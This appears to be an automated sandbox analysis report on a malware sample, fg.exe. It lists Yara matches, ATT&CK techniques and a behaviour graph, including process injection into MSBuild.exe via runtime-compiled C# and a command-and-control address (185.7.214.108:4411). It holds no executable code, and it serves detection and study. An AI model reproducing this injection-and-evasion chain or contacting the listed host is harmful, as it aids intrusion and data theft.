            Source: Yara match File source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: fg.exe PID: 7816, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: csc.exe PID: 6364, type: MEMORYSTR
            Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 516, type: MEMORYSTR
            Source: Yara match File source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED

            MITRE ATT&CK Matrix

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
            Execution: 11 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Privilege Escalation: 412 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
            Defense Evasion: 1 Masquerading; 1 Disable or Modify Tools; 141 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 Timestomp; 1 DLL Side-Loading
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
            Discovery: 131 Security Software Discovery; 2 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 13 System Information Discovery; Wi-Fi Discovery; Remote System Discovery; System Owner/User Discovery; Network Sniffing
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
            Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
            Command and Control: 12 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1632841  Sample: fg.exe  Startdate: 09/03/2025  Architecture: WINDOWS  Score: 100

            Start node
              DNS/IP: pki-goog.l.google.com; c.pki.goog
              Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
              Started: fg.exe 8
            fg.exe 8
              Dropped: C:\Users\user\AppData\...\cy31atwy.cmdline, Unicode; C:\Users\user\AppData\Local\...\cy31atwy.0.cs, Unicode; C:\Users\user\AppData\Local\...\fg.exe.log, CSV
              Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Compiles code for process injection (via .Net compiler); Injects a PE file into a foreign processes
              Started: MSBuild.exe; MSBuild.exe 2; csc.exe 3; conhost.exe
            MSBuild.exe (first instance)
              Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            MSBuild.exe 2 (second instance)
              DNS/IP: 185.7.214.108, 4411, 49717 DELUNETDE France
              Started: WerFault.exe 22 16
            csc.exe 3
              Dropped: C:\Users\user\AppData\Local\...\cy31atwy.dll, PE32
              Started: conhost.exe; cvtres.exe 1
